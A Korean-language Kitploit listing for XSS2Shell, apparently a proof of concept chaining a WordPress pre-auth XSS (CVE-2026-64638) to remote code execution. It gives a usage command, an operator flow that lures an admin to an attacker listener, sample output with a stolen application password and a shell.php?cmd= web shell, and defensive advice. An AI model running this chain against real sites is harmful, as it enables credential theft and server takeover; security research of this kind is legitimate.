Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
XSS2Shell — Wordpress 사전 인증 XSS에서 RCE로 이어지는 익스플로잇 PoC (xss2shell & CVE-2026-64638) | Kitploit
도구/GitHubGitHub/wordsec/xss2shell
Payload GenerationExploitationWeb Application ExploitationPost-ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubwordsec/xss2shell

XSS2Shell

Wordpress 사전 인증 XSS에서 RCE로 이어지는 익스플로잇 PoC (xss2shell & CVE-2026-64638)

저장소 보기
71151개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

XSS2Shell

XSS2Shell은 CVE-2026-64638에 대한 교육용 개념 증명(PoC)으로, 취약한 WordPress 설치 환경에서 사전 인증 XSS 문제의 영향을 보여줍니다. 관리자의 명시적 참여 하에 PoC는 WordPress 애플리케이션 비밀번호를 캡처하고, 임시 페이지를 게시하며, 테스트 플러그인을 업로드하고, 생성된 셸 엔드포인트가 명령을 실행할 수 있는지 확인합니다.

기술 배경: WordPress 사전 인증 XSS에서 RCE로: CVE-2026-64638

교육 및 승인된 테스트 전용입니다. 이 도구는 소유하거나 서면 승인을 받은 WordPress 사이트에 대해서만 실행하세요. 제3자 관리자나 운영 환경을 대상으로 사용하지 마십시오.

Requirements

  • Python 3.7 이상
  • 접근 가능한 WordPress 테스트 설치 환경
  • 대상에 로그인하고 공격자 URL을 열 수 있는 관리자
  • 관리자 브라우저에서 리스너 주소로의 네트워크 접근
  • 서드파티 Python 패키지 없음

Usage

python3 xss2shell_poc.py -t http://wordpress.research.local --lhost 192.168.1.227 --lport 8080 -c "whoami"

Options

옵션필수 여부설명
-t, --target예WordPress 기본 URL (http:// 또는 https:// 포함)
-c, --command예셸이 준비된 후 실행할 명령
--lhost아니요바인딩 및 광고할 리스너 IP, 기본값은 감지된 LAN IP
--lport아니요리스너 포트, 0은 사용 가능한 임의 포트 선택
--keep아니요임시 페이지를 삭제하지 않고 게시된 산출물 유지

대상 URL은 자동으로 정규화되므로 끝에 붙는 슬래시는 선택 사항입니다.

Operator flow

  1. 도구는 /wp-login.php에 접근 가능한지 확인하고 WordPress 로그인 페이지처럼 보이는지 검사합니다.
  2. 로컬 HTTP 리스너를 시작하고 리스너 URL을 출력합니다.
  3. 승인된 관리자가 대상에 로그인하여 해당 URL을 엽니다.
  4. 브라우저 흐름이 애플리케이션 비밀번호를 요청하고 결과를 리스너로 보냅니다.
  5. PoC는 캡처된 자격 증명을 사용하여 임시 공격자 페이지를 게시합니다.
  6. 페이지가 관리자 세션으로 테스트 플러그인을 업로드합니다.
  7. 도구는 shell.php를 확인하고 요청된 명령을 실행합니다.

리스너는 관리자 브라우저에서 접근 가능해야 합니다. NAT, 방화벽, 프록시, 팝업 차단, 혼합 콘텐츠 규칙으로 인해 브라우저 흐름이 완료되지 않을 수 있습니다.

Example output

 __          __           _  _____           
 \ \        / /          | |/ ____|          
  \ \  /\  / /__  _ __ __| | (___   ___  ___ 
   \ \/  \/ / _ \| '__/ _` |\___ \ / _ \/ __|
    \  /\  / (_) | | | (_| |____) |  __/ (__ 
     \/  \/ \___/|_|  \__,_|_____/ \___|\___|
                                              
                                              
xss2shell & CVE-2026-64638 |  https://wordsec.net/ - Education Purpose Only


============================================================
[*] XSS2Shell starting ...
[*] Checking target: http://wordpress.research.local/wp-login.php
[+] Admin panel found: http://wordpress.research.local/wp-login.php
[+] Attacker server listening: 192.168.1.227:8080
[*] On the target website, the admin must open this page and log in:
    ->  http://wordpress.research.local/wp-login.php
[*] Then the admin opens the link that was sent to them:
    ->  http://192.168.1.227:8080/
[*] Waiting for the admin to visit (Ctrl+C to stop) ...
[+] Child popup document initialized
[+] Popup window ready, XSS payload prepared
[+] Application Password saved to xss2shell_creds.json for later runs (shell: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php)
[+] XSS payload POSTed to wp-login.php
[+] Application Password stolen: user=admin pass=3SGS Loba 2Txw EzWz EbZC xZst (saved to xss2shell_creds.json)
[+] Attacker page published: http://wordpress.research.local/xss2shell-1786125273210/
[+] Plugin ZIP upload request sent with the victim's session
[+] Shell reachable: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php

============================================================
[+] Command output:
www-data
============================================================
[*] Cleanup: published page deleted (id=61)
[*] Cleanup: Application Password, plugin shell, and saved credentials preserved

[+] Shell link: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php?cmd=whoami
[+] Done.

Artifacts and cleanup

성공적인 실행은 캡처된 애플리케이션 비밀번호를 xss2shell_creds.json에 저장하여 이후 실행에서 재사용할 수 있게 합니다. 임시로 게시된 페이지는 --keep을 사용하지 않는 한 명령 실행 후 자동으로 삭제됩니다.

테스트 플러그인, 셸 엔드포인트, 애플리케이션 비밀번호, 저장된 자격 증명은 현재 PoC에서 의도적으로 보존됩니다. 승인된 평가 후 테스트 사이트에서 수동으로 제거하고 로컬에서 xss2shell_creds.json을 삭제하세요.

자격 증명 파일을 민감한 정보로 취급하고 절대 버전 관리에 커밋하지 마세요.

Defensive guidance

  • CVE-2026-64638의 영향을 받지 않는 버전으로 WordPress를 패치하세요.
  • 강력한 관리자 인증을 적용하고 2FA를 활성화하세요.
  • 플러그인 설치 및 애플리케이션 비밀번호 생성을 신뢰할 수 있는 역할로 제한하세요.
  • 테스트 후 관리자 애플리케이션 비밀번호, 게시된 페이지, 최근 설치된 플러그인을 검토하세요.
  • 플러그인 업로드 및 REST 엔드포인트에 대한 예상치 못한 요청을 모니터링하고 차단하세요.

License

이 저장소에 포함된 라이선스를 사용하세요.

제작: WordSec

도구 다운로드